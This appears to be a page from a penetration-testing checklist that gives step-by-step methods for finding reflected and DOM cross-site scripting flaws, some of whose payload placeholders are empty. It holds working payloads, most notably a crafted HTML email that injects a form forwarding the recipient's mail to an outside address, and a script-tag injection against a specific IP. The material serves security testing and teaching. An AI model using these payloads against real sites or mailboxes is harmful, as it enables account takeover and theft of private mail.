Reflected Cross Site Scripting

Check List

Methodology

Black Box

XSS Reflected

1

Log in to any platform that allows creating or editing text-based pages (such as a Wiki or documentation system)

2

Create a new page

3

In the field for the page identifier or slug, enter javascript:

4

Configure the page as follows

Title: javascript:

Format: Markdown

Content: [XSS](.alert(1);)

5

Save or publish the page

6

After the page is created, click the link labeled “XSS” in the page content

7

If the system is vulnerable, the JavaScript code will execute (e.g., an alert(1) will appear)

XSS IN Email

1

Create a new text file (e.g. email.txt)

2

Put the following exact contents into the file (including headers and Content-type: text/html)

From: jouko@klikki.fi
To: jouko@hey.com
Subject: HackerOne test
MIME-Version: 1.0
Content-type: text/html

<style>
url(cid://\00003c\000027message-content\00003e\00003ctemplate\00003e\00003cstyle\00003exxx);
url(cid://\00003c/style\00003e\00003c/template\00003e\00003c/message-content\00003e\00003cform\000020action=/my/accounts/266986/forwardings/outbounds\000020data-controller=beacon\00003e\00003cinput\000020type=text\000020name=contact_outbound_forwarding[to_email_address]\000020value=joukop@gmail.com\00003e\00003c/form\00003exxx);
</style>
3

Send the email using sendmail on Linux as an example

/usr/sbin/sendmail -t < email.txt

(or use any other tool capable of sending raw MIME/HTML emails)

4

Open the recipient’s HEY account and load the sent email (refresh the inbox/viewer if needed)

5

Inspect the rendered HTML to find injected tags or form elements (e.g. injected <form ...> or <iframe ...>)

6

Observe any automatic behaviors triggered by the injected HTML (such as POST requests to create forwarding or a full-window iframe)

7

Repeat with the alternative payload examples from the report (iframe-based spoof or <script src=...> + hcaptcha payload) to verify other exploitation vectors

Reflected XSS In Marketing Reports Page

1

Log in to the store's website and complete the authentication process

2

Then go to the report section in your profile

3

When you enter the page, check the URL and find parameters like return_page_pathname= (may be different in each site)

4

Inject the parameter using the following payload and check if the code is executed or not

javascript:alert('XSS')
5

If it is implemented, we hit a vulnerability

Reflected Cross Site Scripting (XSS) Attacks

1

Enter a site and complete the authentication process

2

In the authentication process, make an error on one of the parameters so that the authentication process fails

3

If you encounter errmssg parameters in subsequent requests, inject xss-related payloads in these parameters

4

For example, like this request below

errmsg = [https://102.176.160.119:10443/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E]

DOM XSS

1

Bring up the Burp tool and make a request to the main page of the site

2

In the Response section, click on the search section and search for the word window.location.hash and check if it exists or not

3

If there is, inject the payload as shown below and see if it is reflected or not

DOM XSS in redirect param

1

Logout website

2

Get the request using Burp and check the request

3

In the requests review, if you find a request like the one below, inject the payload

4

Log in through email

XSS Reflected in Redirect_url

1

Log in to the site and complete the registration process

2

Trace the registration process using Burp and inspect the parameters

3

If you see a parameter called redirect_url, inject the following payload as shown below:

4

If the code is reflected, the vulnerability has occurred

Payload For WAF Bypass

1
2
3

Location Information Parameter

1

Log in to your account and profile on the target site

2

Go to the general section of your account and enter the street address, city, and the following payload

3

After injection, save and log in to see your location information and live view

4

For example, something like the path below (keep in mind that this path can be different for each site)

Reflected In ContactForm

1

Log in to the target site and find the contact support feature

2

Then, using the Burp suite tool, make a request to this page and use the GAP extension to identify all the parameters of this page

3

Then you can identify the parameters of the support contact page using the x8 tool and the following command

4

If a parameter is found that is reflected, run the XSS tests. If it is executed, the vulnerability is confirmed

User-Agent Header

1

Log in to the target site and record the requests using the Burp Suite tool

2

Then send a request to Repeater using the Burp suite tool

3

Then replace the User-Agent header value with the following payload and submit the request

4

Refresh the page where the User-Agent is displayed

5

If alert pops → XSS confirmed

Language Parameter

1

Log into the target site and record the requests using the Burp Suite tool

2

Check the requests to see if there is a parameter called lang or language in the request, like the one below

3

Then inject an XSS payload in front of the value of this parameter

White Box

Cheat Sheet

PreviousInput ValidationNextStored Cross Site Scripting

Last updated